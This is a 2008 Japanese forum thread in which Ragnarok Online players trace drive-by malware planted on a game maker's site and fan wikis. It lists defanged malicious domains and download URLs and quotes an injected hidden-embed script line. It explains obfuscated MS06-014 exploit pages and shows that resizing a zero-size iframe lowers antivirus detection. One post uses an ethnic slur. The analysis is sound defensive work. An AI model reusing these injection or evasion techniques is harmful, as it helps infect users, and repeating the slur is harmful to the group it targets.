実績と信頼の面で上な気がする。

>例えば垢ハックサイト等で見られる「サイトを開いた瞬間に感染」といった事でも感染する類のタイプでしょうか
>それとも、ウイルスが仕込まれたexe等実行ファイルを実行しない限りは感染しないタイプでしょうか?

「サイトを見た瞬間感染」というのは、ブラウザが開いたときに
自動的にDLし、実行させるように仕組んであるだけ。

つまりその2タイプは同じ事。
ただ発動のさせ方が、強制的かユーザー操作か、の違いなだけ。

784 名前:(○口○*)さん:08/06/01 14:03 ID:ZDLkMZpn0
ブートセクタやメモリに感染する云々は、ウィルス自体の感染様式の話。
感染経路とは関係ない。

785 名前:(○口○*)さん:08/06/01 15:43 ID:4deL/6oqO
エロゲメーカのゆずソフトOHPが改竄されて
iframe利用して罠サイトに飛ぶ様になってるらしい
BBSPINKは18禁だからアドレス張らんが「ゆずソフト 柚14個目」参照よろ

ν速にもスレ立てられててワロタ

786 名前:(○口○*)さん:08/06/01 15:58 ID:t/Q2xJTn0
>785
ソースチェッカー経由で見てきた

トップに当たる frame■html の先頭にいきなり
>pp■cool0■biz/bmw/am1■htm?34-8681
というサイズ0のフレーム有り

それを潜ると更にiframeで何個かのページに。
ちらっと見たけど、JavaScriptページ以外にこんなものが
>document.write("<EMBED src=http:/www■tongji123■org/4562■swf width=0 height=0>");

サイズ0のswfって事は、アレだろうな……

787 名前:(○口○*)さん:08/06/01 16:33 ID:PhQM5s9f0
手段が違うだけで、どちらの手段を取っても目的(結果)は変わらないというわけですね
勉強になりました

>>783
VMware等の仮想PCやデュアルブート、1CD Linux等も調べ、考慮したのですが
私のPCだとスペック不足であったり、あるいは常日頃から使うには不便な面があり断念しました
その結果、比較的導入しやすく、動作も軽そうなSandBoxに行き着いたのです
しかし、仰る様にやはり信頼性等は軽視出来ない為に悩んでいます

一応ですが、私が参照したサイトを参考までに挙げておきます

簡単な紹介などが掲載されているサイト
念の為■を入れていますので、心配な方はソースチェッカー等掛けて下さい

memo/手軽に実験環境を作れるSandboxie - ranma.biz
http://■ranma.biz/index.php/memo/%E6%89%8B%E8%BB%BD%E3%81%AB%E5%AE%9F%E9%A8%93%E7%92%B0%E5%A2%83%E3%82%92%E4%BD%9C%E3%82%8C%E3%82%8BSandboxie

Windows上にテスト環境を作ってくれる『SandBoxie』 | 100SHIKI.COM
http://www.■100shiki.com/archives/2007/05/windowssandboxie.html

仮想ファイルシステム上で安全にIEを実行するSandboxie - 情報考学 Passion For The Future
http://www.■ringolab.com/note/daiya/2004/10/iesandboxie.html

また、2chのセキュリティ板にSandBoxieのスレがあるのを見つけました
ttp://pc11.2ch.net/test/read.cgi/sec/1178731848/
まだ全てに目を通していませんが、これから見てみます

788 名前:(○口○*)さん:08/06/01 16:42 ID:t/Q2xJTn0
VTに投げてきた

yuzu-soft■com/frame■html
--->pp■cool0■biz/bmw/am1■htm?34-8681
----->pp■cool0■biz/axlz■htm VT 1/31
----->pp■cool0■biz/ax14■htm VT 0/31
----->pp■cool0■biz/re10■htm VT 0/31
----->pp■cool0■biz/re11■htm VT 1/31
----->www■tongji123■org/axfs■htm VT 2/31
------->www■tongji123■org/4561■swf VT 0/31
------->www■tongji123■org/4562■swf VT 0/31

axlz■htm ttp://www.virustotal.com/analisis/37a3f7d974497600ed28019b976835a2
ax14■htm ttp://www.virustotal.com/analisis/11a02a186728bb44bb562c2ca878db7e
re10■htm ttp://www.virustotal.com/analisis/096145bb9c7671f7c979d13869300a07
re11■htm ttp://www.virustotal.com/analisis/b196586622f9c58ae4adad9493b13939
axfs■htm ttp://www.virustotal.com/analisis/b9970be8729f2e93081369449109b375
4561■swf ttp://www.virustotal.com/analisis/2f053cc4054b2feec22400701a69eeb6
4562■swf ttp://www.virustotal.com/analisis/726cb7a3e0abbdf28af09d77afbd2d69

swfもソースの記述的に怪しいけど全部スルーだし、纏めてカスペに提出してきます

789 名前:(○口○*)さん:08/06/01 17:27 ID:t/Q2xJTn0
なんか回答が無茶苦茶早かった

4561.swf - Trojan-Downloader.SWF.Small.ax,
4562.swf - Trojan-Downloader.SWF.Small.ay,
ax14.htm_ - Trojan-Downloader.VBS.Psyme.pp,
axlz.htm_ - Exploit.JS.Agent.os,
re10.htm_ - Exploit.JS.RealPlr.js,
re11.htm_ - Exploit.JS.Agent.ot

次の更新で対応との事

790 名前:(○口○*)さん:08/06/01 17:27 ID:J/n5Mj+U0
>>785
丁度引っかかったぜorz
なんか白くて読み込んでる途中で気づいてブラウザ落としたが
再インスコだろうなぁ・・・orz

791 名前:(○口○*)さん:08/06/01 17:34 ID:aJGAJYQs0
VMWareのWorkStationとかいうやつは大分前にnProにプロセス殺されるようになった。
VMWare起動中にROを起動するとVMWareが固まって、RO起動中にVMWareを
起動しようとするとVMWareが起動しなくなる。

792 名前:(○口○*)さん:08/06/01 17:59 ID:hnMOw2SY0
調査乙

SQLインジェクションに加えて、仕掛けた罠はFlashやRMの
脆弱性など、数撃ちゃ当たる、みたいな格好だな……
エロゲメーカーのOHP狙うあたり、中華も考えてるというか
なんというか。

しかし予想通りというか、OS以外の脆弱性を突くタイプが
増えてきたなぁ。
OSの穴はWUで塞がれるが、Flashの穴とか、この間の騒ぎ
みたいに大きなニュースにならない限り、気にしない人も
多いだろうし。

OS外の脆弱性は正直手に追えないぞ……
PCインストールアプリを細かい部分まで把握してる人なんか
少ないだろうし。

793 名前:(○口○*)さん:08/06/01 18:30 ID:xivT8NA80
しかし日曜日なのに30分で返してくるんだからすごいな……
どこぞのネトゲ運営会社にも見習って欲しいもんだぜ……

794 名前:(○口○*)さん:08/06/01 19:18 ID:JZN7oYRR0
>>792
>エロゲメーカーのOHP狙うあたり、中華も考えてるというかなんというか
考えてないよ。もはやツールで自動でガーっとやってる。
ttp://www.isskk.co.jp/support/techinfo/general/sql_inject_293.html
自分がどこを改ざんしたかすら把握してないんじゃないかな。

795 名前:(○口○*)さん:08/06/01 19:24 ID:x+2c6vex0
公式のトップにインジェクションでサイズ0のフレーム仕掛けたなら
真っ白な画面にはならんと思うんだが?

796 名前:(○口○*)さん:08/06/01 19:27 ID:x+2c6vex0
それと新スレもそろそろ考える必要があるが、テンプレにRMと
FlashのVerも書くようにした方がいいのかねぇ?
ただ増やすと今後キリが無くなる気もするが。

797 名前:(○口○*)さん:08/06/01 19:40 ID:JZN7oYRR0
いらないと思う。本当にきりがない。

798 名前:(○口○*)さん:08/06/01 20:30 ID:pK6iVILZ0
今のテンプレにも「定期的に各種ソフトのアップデートも行え」ってあるしね。

799 名前:788:08/06/01 22:29 ID:t/Q2xJTn0
先ほどチェックした所、PCのカスペで検出・削除した事を確認。
VTでも検出された。

800 名前:(○口○*)さん:08/06/02 14:26 ID:GGjLQpg30
「Safari」Windows版の複合的脅威について、Microsoftが警告
http://internet.watch.impress.co.jp/cda/news/2008/06/02/19775.html

ファイルを勝手にローカルへ保存できてしまう様子

801 名前:(○口○*)さん:08/06/02 15:23 ID:fAObb9qF0
Adobeが一方的に悪いわけではなく
Windows側にも非があるかも知れないって内容なんかな

802 名前:(○口○*)さん:08/06/02 20:57 ID:A0VCVxPc0
何を言ってるんだ…?

803 名前:(○口○*)さん:08/06/03 00:05 ID:LExNuCCW0
ゆずソフトクラッキングと類似したページ発見
benri■5amf■cn

インラインフレームで
ph■errtys■org/gol/am1■htm?272
を呼び出して
その先には
ph■errtys■org/ax14■htm
ph■errtys■org/re10■htm
ph■errtys■org/axlz■htm
ph■errtys■org/re11■htm


すまんが誰かVTやカスペのチェックやっていただけないか時間がない
申し訳ない

804 名前:(○口○*)さん:08/06/03 00:29 ID:8BPea54U0
>>800
先月の時点で話は出ていた
ttp://www.itmedia.co.jp/enterprise/articles/0805/21/news032.html
「当社はこれをセキュリティ問題としては扱わない」(Apple)
だそうだが・・・

805 名前:(○口○*)さん:08/06/03 00:36 ID:qW8uOwnb0
>>803
virustotalに投げてみた

ph■errtys■org/gol/am1■htm
ttp://www.virustotal.com/jp/analisis/89e0c28b7da57f08522178cbeaace002

ph■errtys■org/ax14■htm
ttp://www.virustotal.com/jp/analisis/e9b73505a49f9f1d6ab2586adcc273f9

ph■errtys■org/re10■htm
ttp://www.virustotal.com/jp/analisis/8e1db5dc4334e3dd42d8d7c13f0ec8a9

ph■errtys■org/axlz■htm
ttp://www.virustotal.com/jp/analisis/cff7a236941f46db52dfab1d07ef70b5

ph■errtys■org/re11■htm
ttp://www.virustotal.com/jp/analisis/35694befcac8397b881f39f750fd5800

806 名前:(○口○*)さん:08/06/03 00:37 ID:ooW17KXh0
>803
DNS引いてみた所、ゆずソフトのpp■cool0■bizと
同じIP(61■164■145■62)だった。

が、既にファイルが差し替えられてる風味。
>789でカスペが検出してたのが、今してない。

ax14 7/32 ttp://www.virustotal.com/analisis/e9b73505a49f9f1d6ab2586adcc273f9
re10 0/32 ttp://www.virustotal.com/analisis/8e1db5dc4334e3dd42d8d7c13f0ec8a9
axlz 0/32 ttp://www.virustotal.com/analisis/cff7a236941f46db52dfab1d07ef70b5
re11 1/32 ttp://www.virustotal.com/analisis/1698c31d132f5c401f621b71623001b6

検体提出してくる

807 名前:(○口○*)さん:08/06/03 00:49 ID:qW8uOwnb0
>>806
乙です

>>788
pp■cool0■biz/bmw/am1■htm (5/32)
ttp://www.virustotal.com/jp/analisis/02b71618dc71e6a28416e982d8fdb02c

ph■errtys■org/gol/am1■htm (4/32)
http://www.virustotal.com/jp/analisis/89e0c28b7da57f08522178cbeaace002

なんか気になったので見たら別物だった…

808 名前:(○口○*)さん:08/06/03 00:50 ID:pVRZ9TWo0
まースクリプトはいいんじゃない?
本体はこれ。2008-05-30。
dm■htifns■com■cn/vv.exe
ttp://www.virustotal.com/analisis/26c5dc475eda7c75a5d1676b90c5beb6
NortonとNOD32以外は捕獲できる模様。

809 名前:(○口○*)さん:08/06/03 00:52 ID:pVRZ9TWo0
んでこれ3つ同じね。
ph■errtys■org
pp■cool0■biz
d■sorryl■biz

810 名前:(○口○*)さん:08/06/03 01:20 ID:pVRZ9TWo0
w■117b■cn/net/are.exe
こちらはavastとKasperskyに提出。
ttp://www.virustotal.com/analisis/fb9a810c7a10558e1d9b221964ff078f

811 名前:まとめ臨時 ◆kJfhJwdLoM:08/06/03 01:38 ID:4EJ/23co0
更新前に滑り込み810さん分も追加。

117b■cnで検索をかけるとめっちゃでてきますね。
ファイル置き場なのか連番で置かれている模様。
どっかにもしかしたらリスト置き場もあるのかもしれませんね。

812 名前:(○口○*)さん:08/06/03 02:17 ID:pVRZ9TWo0
>>811
今は www■mvoe■cn と同じ。たぶんこっちのほうが有名。
以前はマルチドロッパ(ダウンローダ)が参照するtxtに書いてあった。
参照 http://gemma.mmobbs.com/test/read.cgi/ragnarok/1195956271/750

813 名前:(○口○*)さん:08/06/03 02:18 ID:ooW17KXh0
カスペから返答
>Hello.
>New malicious software was found in the attached files.
>Its detection will be included in the next update. Thank you for your help.

普段だと検出名書いてくるのに、今回はこれだけだった。


>808
ax14ってDropper型?
何かのバイナリを作成して実行してるようだけど。

最終的に>808のEXEを取りに行くだけなんだろうけど
見慣れないのはどうにも気になる。

814 名前:(○口○*)さん:08/06/03 02:35 ID:pVRZ9TWo0
>>813
いや、バイナリじゃなくてただの難読化。
最近「eval(function(p,a,c,k,e,d)〜」や「base64encode」と並び、よく見かける形式。
ax14というファイル名のとおり、平文に戻すとclsid:BD96C556(略)とか
Microsoft.XMLHTTPとかのいつものMS06-014。

参考 McAfeeブログ
ttp://www.avertlabs.com/research/blog/index.php/2008/05/14/the-commercial-html-packer-dilemma/

ちょっと確認するだけならdocument.writeやexecuteをalertにして踏む(笑)。

815 名前:(○口○*)さん:08/06/03 02:56 ID:pVRZ9TWo0
これ3つ同じ。
w■117b■cn
www■mvoe■cn
www■mmboi■cn

816 名前:(○口○*)さん:08/06/03 09:20 ID:pVRZ9TWo0
大暴れしたwww■adw95■com(ググるとすごい)の新ドメイン3つ。
www■logid83■com
www■sysid72■com
www■en-us18■com
b.jsからiframeでen-us18設置のFlashを使用。

817 名前:(○口○*)さん:08/06/03 12:32 ID:NjVoKyk10
2008年になってからしばらく少なかったのに
ココ最近すごい勢いで増殖してるな……
ゲーム内BOTも増えたし、中華またROに目つけたんだろうな

818 名前:(○口○*)さん:08/06/03 14:10 ID:4KfxT3Fm0
支那狗はほんと手段を選ばんな

819 名前:(○口○*)さん:08/06/03 17:26 ID:pVRZ9TWo0
>>817
BBSやBlogやWikiへの投下という旧来の手法が減っただけで、
SQLインジェクションによる正規サイトへの注入という形で
トータルでは増えてるかと。
去年の11月くらいから目立ち始め、5月からが特にひどい。

820 名前:(○口○*)さん:08/06/03 19:47 ID:q71iIbcu0
SAKURAの経路(ゲートウェイ?)クラックはまたエライこっちゃな。

SAKURAの発表の能天気具合も。。。

821 名前:(○口○*)さん:08/06/03 21:06 ID:mYp5uAdo0
ARP Spoofing
xreaでもあった手口ですな

822 名前:(○口○*)さん:08/06/03 21:40 ID:pVRZ9TWo0
>>821
>xreaでもあった手口ですな
最近? ヴァナモンもこれかな?

823 名前:(○口○*)さん:08/06/03 21:55 ID:aJ8LpO+e0
この件は、単なるサーバ改竄よりも深刻だな。
例え、自分の管理下サイトが強固なセキュリティ対策を施していたとしても、同一ホスティング事業者に穴があればそこにつけ込まれてしまう。
SAKURAの場合、専用/共用サーバの再販なども普通に行われているから、管理上不十分な要素が生まれやすいのもあるし。

Yahooニュースにも掲載
ttp://headlines.yahoo.co.jp/hl?a=20080603-00000001-vgb-secu

関連投稿
ttp://ruriko.denpa.org/200806a.html#0201
ttp://memo.st.ryukoku.ac.jp/archive/200806.month/9458.html

ARPスプーフィング:読者のWebホスティング・サービスは守られているか:ITpro
ttp://itpro.nikkeibp.co.jp/article/COLUMN/20071019/284979/

ここ(MMOBBS)もSAKURAの共用サーバでサービスされている以上、対岸の火事とは言えない状況。
安全性確保の観点では、各種ソフトウェアの更新はもちろんだが、それ以上に有用な対策として、専用ブラウザの導入を強く推奨。

824 名前:(○口○*)さん:08/06/03 22:07 ID:7TgYYYLd0
>>816
sysid72■com/b■jsのiframeはランダムっぽい
redir94■comも

825 名前:(○口○*)さん:08/06/03 22:50 ID:ooW17KXh0
>Windows XP SP3導入でFlash Playerが脆弱に?
>ttp://www.itmedia.co.jp/news/articles/0806/03/news023.html

>脆弱性のあるバージョンのFlash Playerが、Windows XP SP2とSP3、
>XP Professional x64 Editionで再配布されたことを明らかにした。
>
>Windows XP SP2とXP Professional x64 Editionの場合、これまでに
>配布されたセキュリティアップデートを適用していれば改めて更新する
>必要はないという。しかしXP SP3の場合、Flash Playerの脆弱性に対処する
>セキュリティアップデートを直ちに適用するよう、ユーザーに促している。


以前に9.0.124.0を当ててても、SP3当てた時点でバージョンダウンしてる模様。
SP3を当てた人は再度自分のFlashPlayerのバージョンを確認した方がいいかも。

826 名前:(○口○*)さん:08/06/04 00:04 ID:aQs8KTty0
>>824
さっき見つけたw

827 名前:(○口○*)さん:08/06/04 00:56 ID:m8vk7Wkh0
>318 (○口○*)さん sage New! 08/06/04 00:32 ID:IaVlzlwY0
>ttp://www■gmog■jp/kinos/

騎士子萌えスレに貼られていたもの。whoisではIPに該当なし。
ソースチェッカーで見たら、swf呼び出しがあった。それ以降は確認してません。

「www■gmog■jp」のIPアドレスへの変換結果→「203■192■157■237」
「203■192■157■237」のドメイン名への変換結果→「ip-203-192-157-237■asianetcom■net」

828 名前:(○口○*)さん:08/06/04 01:06 ID:IPxJaNTh0
それ、関係ない。

「キノスワールド〜パジャマの騎士〜」(配信元 GMO Games)の
公式サイト。
ttp://www.4gamer.net/games/047/G004717/20080603035/

829 名前:(○口○*)さん:08/06/04 01:13 ID:oGYnp8Dq0
index■swf 0/32 ttp://www.virustotal.com/jp/analisis/ab684464a461aceeb1048c97773c1299

しかしswf拒否すると見られない公式サイトなんて怖すぎる…

830 名前:(○口○*)さん:08/06/04 09:11 ID:QCHZUkyV0
もうブラウズは仮想PC上から使う方がいいな

831 名前:(○口○*)さん:08/06/04 09:43 ID:M2a3ikrl0
パソコン使わなきゃウィルス踏まなくね?

832 名前:(○口○*)さん:08/06/04 10:10 ID:cnDFr36A0
>>820-823
高木センセイのところにも載ったねぇ

>2008年06月03日
■ 通信路上の改竄攻撃発生に、Webサイト運営者が説明責任を負うのか?

833 名前:(○口○*)さん:08/06/04 10:12 ID:3MQ5/ntC0
Wiiでブラウズすれば、ちっとは安全?

834 名前:DC:08/06/04 10:39 ID:QCHZUkyV0
@の俺にまかせろよ

835 名前:(○口○*)さん:08/06/04 11:26 ID:4zyNgQRY0
別板で聞いたのですがスレチという事でここで聞きたいのですが
RO起動するとnProが作動してctfmon.exeがbackdoorだとか出るんですが
ctfmon.exeって別に問題ないソフトでそれに偽造してるものがbackdoorらしいんだけど
nProは正規のものをウイルスだと断定してアラートしてるのでしょうか?

836 名前:(○口○*)さん:08/06/04 13:43 ID:vWVvQq7f0
日本語でおk

837 名前:(○口○*)さん:08/06/04 14:45 ID:AYXQJFXx0
ctfmon.exeが「本物」なら問題ないですし、それをnProが誤検出したとは
(あり得ないことではないですが)聞いたことはないです。

が、偽のctfmon.exeを作るウイルス類はあるわけで

(例)
W32.Mandaph - Symantec.com
ttp://www.symantec.com/ja/jp/security_response/writeup.jsp?docid=2008-042816-0445-99&tabid=2
マカフィー株式会社--セキュリティ情報-- BackDoor-DIW
ttp://www.mcafee.com/japan/security/virB2006.asp?v=BackDoor-DIW

多分感染して(偽ctfmon.exeをおかれて)いる状態なのでしょうから

他のウィルス対策ソフトで検索&駆除(場合によってはOSクリーンインストールも)をおすすめします。

838 名前:(○口○*)さん:08/06/04 16:34 ID:aQs8KTty0
「本物の」ctfmonを誤検知したのなら大騒ぎだろうねw

839 名前:(○口○*)さん:08/06/04 17:31 ID:3MQ5/ntC0
関連記事ぽ
http://internet.watch.impress.co.jp/cda/news/2008/06/04/19815.html

>『魔法の剣』や『ドラゴンの鎧』を盗まれたと警察に届けても笑われるだけ。

>ガンホーのゲームのアカウントハッキングを受けたユーザーの9割が、
>セキュリティソフトを利用していなかったと聞いている。

840 名前:(○口○*)さん:08/06/05 00:46 ID:gUiLcGqKO
株券の電子化のお陰でデータと現金の関連が説明しやすくなったよ
それでも「所詮はゲームでしょ?」と言われるけどな

841 名前:(○口○*)さん:08/06/05 01:09 ID:Yx3lB9sT0
言葉のニュアンスはどうあれ、
ゲーム内で閉じている架空資産を現実の資産と認定すると、
ゲームシステムによっては犯罪者だらけになってしまうからな。(PKによるドロップとか)

アカウントハッキングそのものが犯罪であるという方向と、
それによって正常なサービスを受けられないって方向で主張するしかない。

842 名前:(○口○*)さん:08/06/05 01:17 ID:qPTTXnjZ0
ただ有料アイテムがあるから、その扱いが微妙だな

843 名前:(○口○*)さん:08/06/05 02:54 ID:E3jGDFIM0
各職テンプレサイトのWikiなどが改変されまくりの模様、注意されたし

844 名前:(○口○*)さん:08/06/05 16:12 ID:+fywNMVIO
今の時代セキュリティソフト使わないやつとか存在したんだな

845 名前:(○口○*)さん:08/06/05 16:22 ID:iQ1mWmmp0
>風間氏は、「ガンホーはゲーム会社として早期から
>セキュリティの啓蒙活動に積極的に取り組んできた企業。

846 名前:(○口○*)さん:08/06/05 16:30 ID:JwivVod20
>>845
アンチガンホーが騒ぎたいのは分かるが自重

847 名前:(○口○*)さん:08/06/05 17:48 ID:ELk5zJax0
クルセwikiは、垢ハックアドレスにかなり書き換えられてます
転送確認プラグインがあるので、回避すること事態は容易

848 名前:(○口○*)さん:08/06/05 18:24 ID:eoOo2QTg0
そこまでは安全ですか?
その先に行けばアウトはわかるのですが、先ほど気づかず転送確認のページまでいきました(TT

849 名前:(○口○*)さん:08/06/05 18:38 ID:RjduvW6D0
転送確認でアウトだったらなんのための確認なんだよw
というわけで転送確認ページまでは問題ない

850 名前:まとめ臨時 ◆kJfhJwdLoM:08/06/05 19:45 ID:tPgAGr2A0
Wikiに湧き出したfsbahsyggは書き込みを見て、
早めに追加したのですが被害が増えなければいいのですけど。
とりあえずちょこちょこ追加しています。

中の人の危うい事といえばリストを追加している時に
リネージュ資料室さんのウイルス更新状況から
www■xppsdo■cn/tianyi■htmと
www■fire122■cn/zi■htmから繋がっている物の中に
download■macromedia■com/pub/shockwave/cabs/flash/swflash■cab
というものがあるのですが、
ソースチェッカーオンラインにサラにかけてみると
fpdownload2■macromedia■com/get/shockwave/cabs/flash/swflash■cab
macromedia■comをGoogle先生にかけるとadobeデベロッパーセンターだった模様。
正規のダウンロードセンターまでリストに加えてしまうところでした。

macromedia■com自体は正規のFlashPlayerダウンロードサーバーで
www■live322■cn/4561■swfを
FlashPlayerが入っていない人に読み込ますために
www■xppsdo■cnとかの場所にスクリプトで一緒に併記している・・・
と推測したのですけど、だとしたら手が込んでいるなあとか。

851 名前:(○口○*)さん:08/06/05 20:48 ID:hjRu6f/l0
今回のWiki改変は同一人物っぽいね
初期でIP遮断したケミWikiは荒らされてないし
今もまだ改変しまくってるからWiki管理者がアク禁しない限りいたちごっこかと

852 名前:(○口○*)さん:08/06/05 20:53 ID:+dvh0Ym40
>>851
ところで荒らされてないWikiってあるのかな?
効率Wikiは完全編集シャットアウトだから良いけど

なんかROに関するWikiを片っ端からやってる気がするから

853 名前:(○口○*)さん:08/06/05 21:09 ID:5LliKy3b0
>>852
超初心者wikiは手付かず状態

854 名前:まとめ臨時 ◆kJfhJwdLoM:08/06/05 21:18 ID:RD/WPPQW0
殴りWizSage系のWikiとかも今のところは問題なさそう…。

855 名前:(○口○*)さん:08/06/05 21:31 ID:RjduvW6D0
拳聖wikiも平和だな。平和というか、スルーされてるというか…
さすがマイナー職(´・ω・)

856 名前:(○口○*)さん:08/06/05 21:36 ID:TYEpIoW20
ここに書いたら改変対象に加えられたりして…だったらやだな。

857 名前:(○口○*)さん:08/06/05 21:38 ID:KNwgNs6U0
アコプリWikiも平和だな

狙いを絞り込んでるのかWiki管理人が対応済みなのかは分からないけど
被害を受けてる方が少ないんじゃない?

858 名前:(○口○*)さん:08/06/05 21:42 ID:OGRfypik0
>>850
ホームページの作り方みたいなのでFlashの入れ方の
テンプレと言ってもいい書き方だよ(objectタグ、embedタグ)。
手が込んでいるというよりコピペしただけかと。
リネージュ資料室さんの更新状況は
埋め込まれたURIっぽいのを機械的に拾ってるので人手による精査は必要。

859 名前:(○口○*)さん:08/06/05 21:43 ID:OGRfypik0
最も危険なドメインは香港の「.hk」、米McAfee調査
ttp://internet.watch.impress.co.jp/cda/news/2008/06/05/19835.html
そういや英国から中国へ返還されてだいぶ経つなぁ。

860 名前:(○口○*)さん:08/06/05 22:39 ID:+dvh0Ym40
貧スレWiki・RO Common Data・クエスト案内所の被害が無いのは確認

861 名前:(○口○*)さん:08/06/05 22:47 ID:TYEpIoW20
というか、その被害が無いってのは「現時点で」ってことも忘れずに。

確認の直後に書き換えられている可能性もある訳だから。

862 名前:(○口○*)さん:08/06/05 22:56 ID:1sO+nJ4G0
調べたこと無いので分からないんだけれど、今ある攻撃って
「どの脆弱性を突いた」ものなんだろう?
閲覧だけで感染のおそれがある、では、感染しなくてもそれを
確かめられず安心できないというのもある。

ただ、その話をすればきりがなくなるのも事実なので、何か新しい
アプローチが必要なのかもしれない。

863 名前:(○口○*)さん:08/06/05 23:00 ID:jtEktfia0
誰でも編集できるWikiのリンクが改竄されてるだけなんだが
どこから脆弱性の話になるのか解説キボン

864 名前:(○口○*)さん:08/06/05 23:01 ID:jtEktfia0
・・・その改竄先を踏んでしまった場合の話か。スマンカッタ

865 名前:(○口○*)さん:08/06/05 23:06 ID:RjduvW6D0
現状で旬(笑)なのはFlashPlayerの脆弱性かねえ。
他の既知の脆弱性をついた攻撃も併用してるだろうし、一概に「コレ」と言えるようなものじゃないと思うけど

866 名前:(○口○*)さん:08/06/05 23:13 ID:E3jGDFIM0
昔のをそのまま使ってたり、最新のをいち早く使ってきたり様々
セキュリティわかってない人間も多いから、古いの置いておいても仕掛けた側は引っかかったらラッキーくらいに思っておいてるんじゃない?

867 名前:(○口○*)さん:08/06/05 23:22 ID:xBicn86c0
今回の改竄も、どうやら毎度おなじみODNリモホから行われているようだけど、各Wiki管理サイドは、ISPに対して迷惑行為の
通報は行っているのだろうか。
未着手のようであれば、それこそ連名で厳重抗議を行い、強制退会に持ち込ませるべきだろう。
あるいは、再三の警告を送っても効果が薄いようであれば、半永久的IP BANも止むなしだとは思う。

それとは別に、RBLのように複数Wikiから参照できるブラックリスト・システムも必要かもしれない。
それぞれの管理人の事情で、個別にブロック対応する足並みが揃わないのだから、共通化InterWikiNameのように一意で指定する
ロジックを組み込むとか。rowiki.jpのように基盤はある程度整っているし。

868 名前:(○口○*)さん:08/06/05 23:55 ID:hS3zrSu10
さくらインターネットの件が公式に出てますね
ttp://www.sakura.ad.jp/news/archives/20080605-002.news

■発生日時
  2008年6月1日(日)01時52分 〜 6月2日(月)17時23分の間

■対象のウェブサイト
  専用サーバ 10M スタンダードの一部
  (IPアドレス 219.94.145.0 〜 219.94.145.127 の範囲で99台)

869 名前:(○口○*)さん:08/06/06 00:08 ID:qYZX087H0
今は危ないって事を知らずにwikiでさっきリンカの調べものしてたんですけど
カスペルでオンラインスキャンをしたらTrojan-Clicker.HTML.IFrame.jvというものがでてきました
転送確認だとかそういうのは見た覚えないんですが・・・
これはwiki見てた事が原因でかかったと見てもいいんですか?

870 名前:(○口○*)さん:08/06/06 00:11 ID:z0zcjBx30
>869
「Wikiを見た」だけだと感染しない。
「Wikiのリンクをクリックして不審な外部サイトを見た」のなら、その可能性が大。

871 名前:(○口○*)さん:08/06/06 00:19 ID:qYZX087H0
キルの考察だとか基礎知識だとかいうところをクリックしてちょろっと見ただけで
そこも特に変なところはなかったんです
変な外部サイトみたいなのには飛んでません

872 名前:(○口○*)さん:08/06/06 00:19 ID:qYZX087H0
スが抜けてたorz

873 名前:(○口○*)さん:08/06/06 00:29 ID:P75MQlKG0
リンカWikiの管理人さんが今日の0:09に対応完了しました、とコメント残している。
>869はそれ以前の状態でWikiから踏んだ可能性があるわけだから、gdgd言ってもしょうがないよ
とりあえず心配なら再インストールコース。
あとこれからWikiみたいな編集可能なページ見る時は十分注意するしかない。今回のことで
以降の対応、しっかりできるようになるだろ? 前向きに見ようぜ

874 名前:(○口○*)さん:08/06/06 00:30 ID:Fl1Dcarp0
外部リンクへのクッションがないものもある。

iframeで別サイトを呼び出す場合、元のサイトそのものは普通に表示される。

危険URLを読み込んでいる可能性があるので、スキャンして除去した上でOS入れなおしを推奨。

875 名前:(○口○*)さん:08/06/06 00:48 ID:lU4ja0K10
iframeをブラウザなどのプラグイン、
もしくはセキュリティ対策ソフトで検出出来る奴ってある?

ものによってはめちゃめちゃ反応しそうだけど。

876 名前:(○口○*)さん:08/06/06 00:57 ID:qYZX087H0
なるほどー
しかしカスペルのお試しでスキャンしたら見つかったのに
本命のマカフィーさんでスキャンしても異常なしと出ます・・
何とか削除する方法を色々と調べてるのですが
こういう知識はさっぱりなので苦戦しています

877 名前:(○口○*)さん:08/06/06 00:57 ID:XyV1GWt80
あったとしてもJavaScriptで隠されると検出難しいような

878 名前:(○口○*)さん:08/06/06 00:59 ID:yhM9ImhM0
>>875
FirefoxならNoScriptというプラグインで iframeの禁止が出来る

879 名前:(○口○*)さん:08/06/06 01:07 ID:wCxG9qvx0
>>867
>それとは別に、RBLのように複数Wikiから参照できるブラックリスト・システムも必要かもしれない。
>それぞれの管理人の事情で、個別にブロック対応する足並みが揃わないのだから、共通化InterWikiNameのように一意で指定する
>ロジックを組み込むとか。rowiki.jpのように基盤はある程度整っているし。

ことあるごとに,ときに各サイト管理人にプレッシャーをかけつつ,こういう素晴らしい提案を
なさる方がいらっしゃるけど,いつも同じ方かな?

むしろ提案のみならず,それを主催し,保守・管理していって貰いたいものです.

880 名前:(○口○*)さん:08/06/06 01:14 ID:yhM9ImhM0
ブラックリストの難しいところは、信用できるリストをこまめに管理すること

リストを参照してアクセス制御すること自体は大して問題ではない

881 名前:(○口○*)さん:08/06/06 01:21 ID:XyV1GWt80
情報提供の手段はいくらでもあるとして、常にアクティブな管理サイドの
人間がいないと「生きたリスト」を維持するのは難しいね。
URLのブラックリストがそれを如実に表している。

882 名前:(○口○*)さん:08/06/06 01:22 ID:z0zcjBx30
ハクスレ815や>869の検出結果がちょっと気になったので
teamerblogのソースを拾ってきて、iframeの部分を書き換えて
VTに投げてみた

>width="0" height="0" frameborder="0" → VT 13/32 (オリジナル)

ここからサイズを変更してみると

>width="1" height="0" frameborder="0" → VT 3/32
>width="0" height="1" frameborder="0" → VT 3/32
>width="0" height="0" frameborder="1" → VT 3/32
>width="1" height="1" frameborder="0" → VT 3/32
>width="1" height="0" frameborder="1" → VT 3/32
>width="0" height="1" frameborder="1" → VT 3/32
>width="1" height="1" frameborder="1" → VT 3/32

なんとなくそんな気はしてたんだよね……


最終的に罠スクリプトやEXE等を引っかけてくれれば十分だし
あのソースだと仕方がないのは判るけど、なんかやっつけ仕事に
思えて仕方がない(苦笑

883 名前:(○口○*)さん:08/06/06 01:30 ID:RyetHJq70
>876
ソフトによって検出できないウィルスってのは確実にある
カスペが信用できないなら他のアンチウイルスソフト試してみたら?
avast! 4とかならフリーで使えるし

でも正直、被害に遭う前に、データ退避してPC初期化したほうが・・・

クリーンな環境に戻してから、すぐにパスワードを変更
もし他にパソコンがあるなら、そっちからガンホーのパスとアカウントのパスを変更

初期化できない事情があるなら、せめてPeerGuardianだけでも入れたほうがいい

884 名前:(○口○*)さん:08/06/06 02:00 ID:TQ1IKYwE0
>>874
それはROの職Wiki内とかでも一般ユーザーの更新で出来ちゃうのでしょうか?

885 名前:(○口○*)さん:08/06/06 02:24 ID:lHoGydKF0
>>884

link.phpを実装してる場合を仮定すると
link.phpそのものを改変するは通常無理

